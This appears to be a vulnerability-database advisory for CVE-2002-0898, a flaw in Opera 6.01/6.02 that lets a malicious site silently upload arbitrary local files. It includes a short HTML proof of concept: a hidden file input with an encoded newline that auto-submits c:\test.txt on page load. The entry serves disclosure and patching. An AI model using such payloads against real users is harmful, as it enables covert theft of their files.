Opera 6.0.1/6.0.2 Arbitrary File Disclosure Vulnerability

基本字段

漏洞编号:
SSV-75309
披露/发现时间:
2002-10-04
提交时间:
2014-07-01
漏洞等级:
漏洞类别:
其他类型
影响组件:
Opera
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
CVE-2002-0898
CNNVD-ID:
CNNVD-200210-081
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.05KB
1
2
3
4
5
6
7
8
9
10
11
12
13
source: http://www.securityfocus.com/bid/4834/info
A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking no file has been specified. This is possible if the filename is appended with the string "
". This HTML-encoded newline character will cause the browser to believe that no value has been set. Consequently, the form will be submitted and the specified file will be uploaded to the server. This may occur without knowledge or consent of the victim user.
Exploitation of this vulnerability allows for malicious webmasters to obtain arbitrary files from client systems.
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

共 4 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1347
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负